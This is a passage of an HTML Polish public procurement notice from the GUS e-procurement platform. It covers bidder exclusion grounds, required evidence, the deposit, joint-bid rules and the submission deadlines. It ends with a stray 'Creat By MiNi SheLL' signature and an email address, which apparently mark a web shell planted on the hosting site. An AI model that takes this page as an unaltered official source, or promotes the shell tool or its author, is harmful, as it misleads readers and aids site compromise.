1 pkt 6 ustawy,e)art. 109 ust. 1 pkt 1<br/>ustawy, odnośnie do naruszenia obowią. Dot. płatności podatków i opłat lokalnych, o których mowa w ustawie z dnia 12 stycznia 1991 r. o podatkach i opłatach lokalnych,f)art. 109 ust. 1 pkt 5–8 i pkt 10) ustawy;7)dok. Wyko. prowadzącego działalność gosp,, potwierdzającego, że jest wpisany do jednego z rejestrów zawod. lub handl., prowadzonych w kraju, w którym ma siedzibę lub miejsce zamiesz.; 8)dowodów potwierdz. spełnienie warunków udziału w postęp. w zakresie doświa., określających czy wskazane w oświadc., o którym mowa w pkt 9.1 SWZ, usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dok. sporządzone przez podmiot, na rzecz którego dostawy lub usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykon, z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dok. – oświad, wykon,; w pr. bądź inne dok. potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 msc.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający przed udzieleniem zamówienia, wezwie Wykonawcę, którego<br/>oferta została najwyżej oceniona, do złożenia w wyznaczonym, nie krótszym niż 10 dni terminie, aktualnych na dzień złożenia następujących podmiotowych środków dowodowych:<br/>1) dokumentu Wykonawcy prowadzącego działalność gospodarczą, potwierdzającego, że jest wpisany do jednego z rejestrów zawodowych lub handlowych, prowadzonych w kraju, w którym ma siedzibę lub<br/>miejsce zamieszkania; 2) dowodów potwierdzających spełnienie warunków udziału w postępowaniu w zakresie doświadczenia, określających czy wskazane w oświadczeniu, o którym mowa w pkt 9.1 SWZ, usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są<br/>referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy lub usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie<br/>powinny być wystawione w okresie ostatnich 3 miesięcy.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Zamawiający wymaga, aby wadium wniesione zostało przed upływem terminu składania ofert w kwocie 2.500,00 zł (słownie: dwa tysiące pięćset złotych 00/100), i utrzymane zostało nieprzerwanie do dnia upływu terminu związania ofertą, z wyjątkiem z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia (w rozumieniu art. 58 ustawy)<br/>są obowiązani do ustanowienia pełnomocnika i złożenia wraz z ofertą pełnomocnictwa do<br/>reprezentowania Wykonawców w postępowaniu albo reprezentowania Wykonawców w<br/>postępowaniu i zawarcia umowy.<br/>2. Treść pełnomocnictwa musi jednoznacznie określać czynności, co do wykonywania, których<br/>pełnomocnik jest upoważniony. W przypadku, gdyby pełnomocnictwa udzielała osoba inna niż<br/>uprawniona z mocy prawa lub umowy spółki do reprezentowania podmiotu, do oferty należy<br/>dołączyć również pełnomocnictwo do dokonania tej czynności.<br/>3. Pełnomocnictwa powinny być dołączone do oferty w oryginale w formie dokumentu<br/>elektronicznego opatrzonego kwalifikowanym podpisem elektronicznym.<br/>4. Do udzielenia pełnomocnictwa dla osoby, o której mowa w pkt 1.1.3, postanowienia pkt 1.3 i<br/>1.4 stosuje się odpowiednio.<br/>5. Wspólników spółki cywilnej obowiązują przepisy dotyczące Wykonawców wspólnie <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian umowy oraz warunków ich wprowadzenia zostały określone w Załączniku nr 6 do SWZ, stanowiącym wzór umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-03-02 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">http://zamowienia-gus.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-03-02 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 90 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Zamawiający przewiduje stosowanie procedury, określonej w art. 139 ust. 1 ustawy Prawo zamówień publicznych.<br/>2. Klauzula społeczna – pkt 3.4 SWZ, klauzula środowiskowa – pkt 3.5 SWZ, zatrudnienie na umowę o pracę – 3.6. SWZ.<br/>3. Klauzula informacyjna z art. 13 RODO w celu zw. z post. o udz. zam. publ. (pkt 1.16 SWZ). Zasady zachowania pouf. danych i inf. (pkt 1.17 SWZ).<br/>4. Ofertę należy złożyć pod rygorem nieważności w postaci elektronicznej podpisanej kwalifikowanym podpisem elektronicznym, za pośrednictwem platformy dostępnej pod adresem (http://zamowienia-gus.ezamawiajacy.pl).<br/>5. Zamawiający wykluczy wykonawcę zgodnie z art. 108 ustawy. Zamawiający przewid. wykluczenie wykon. na podst. art. 109 ust. 1 pkt 1, pkt 4–8 i pkt 10 ustawy. 6. Zamawiający przed udzieleniem zamówienia wezwie wykonawcę, którego oferta została najwyżej oceniona, do złożenia następujących podmiotowych środków dowodowych – pkt 9.8<br/>SWZ:<br/>1) informacji z Krajowego Rejestru Karnego w zakresie określonym w:<br/>a) art. 108 ust. 1 pkt 1 i 2 ustawy z dnia 11 września 2019 r. – Pzp,<br/>b) art. 108 ust. 1 pkt 4 ustawy, dotyczącej orzeczenia zakazu ubiegania się o zamówienie<br/>publiczne tytułem środka karnego;<br/>2) ośw. wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej<br/>grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i<br/>konsumentów, z innym wykon., który złożył odrębną ofertę, ofertę częś. lub wniosek o dop. do<br/>udziału w post., albo ośw. o przyn. do tej samej gr. kap. wraz z dok. lub infor. potw. przyg. oferty, oferty częś. lub wniosku o dop. do działu w post. niezależnie od innego wykon. należącego do tej samej grupy kapitałowej;<br/>3) zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego, że wykon. nie zalega z opłacaniem podatków i opłat, w zakresie art. 109 ust. 1 pkt 1 ustawy (...);<br/>4) zaświadczenia albo innego dokumentu właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub właściwego oddziału regionalnego lub właściwej placówki terenowej Kasy Rolniczego<br/>Ubezpieczenia Społecznego potwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne i zdrowotne, w zakresie art. 109 ust. 1 pkt 1 ustawy (...); 5) odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji,<br/>6) oświadczenia wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy, w zakresie podstaw wykluczenia z postępowania wskazanych przez zamawiającego, o których mowa w: <br/>a) art. 108 ust. 1 pkt 3 ustawy,<br/>b) art. 108 ust. 1 pkt 4 ustawy,<br/>c) art. 108 ust. 1 pkt 5 ustawy,<br/>d) art. 108 ust. 1 pkt 6 ustawy,<br/>e) art. 109 ust. 1 pkt 1 ustawy,<br/>f) art. 109 ust. 1 pkt 5–8 i pkt 10 ustawy;<br/>7) dokumentu wykonawcy prowadzącego działalność gospodarczą, potwierdzającego, że jest wpisany do jednego z rejestrów zawodowych lub handlowych, prowadzonych w kraju, w którym ma siedzibę lub miejsce zamieszkania; 8) dowodów potwierdzających spełnienie warunków udziału w postępowaniu w zakresie doświadczenia, określających czy wskazane w oświadczeniu, o którym mowa w pkt 9.1 SWZ, usługi zostały wykonane lub są wykonywane należycie (...)7. Dokumenty podmiotów zagranicznych, wspólnych (pkt 9.9 i 9.10 SWZ).<br/>8. Wadium: 2 500,00 PLN.<br/>9. ZNWU: 5 % wartości umowy z VAT.<br/>10. W przedmiotowym postępowaniu komunikacja między zamawiającym a wykonawcami, szczegółowo określona w pkt 10 SWZ, odbywać się będzie języku polskim, przy użyciu:<br/>1) platformy zakupowej zamawiającego, zwanej dalej „platformą”, dostępnej pod adresem (http://zamowienia-gus.ezamawiajacy.pl);<br/>2) poczty elektronicznej.<br/>11. W przedmiotowym postępowaniu złożenie oferty możliwe będzie przy użyciu platformydostępnej pod adresem (http://zamowienia-gus.ezamawiajacy.pl).

Creat By MiNi SheLL
Email: jattceo@gmail.com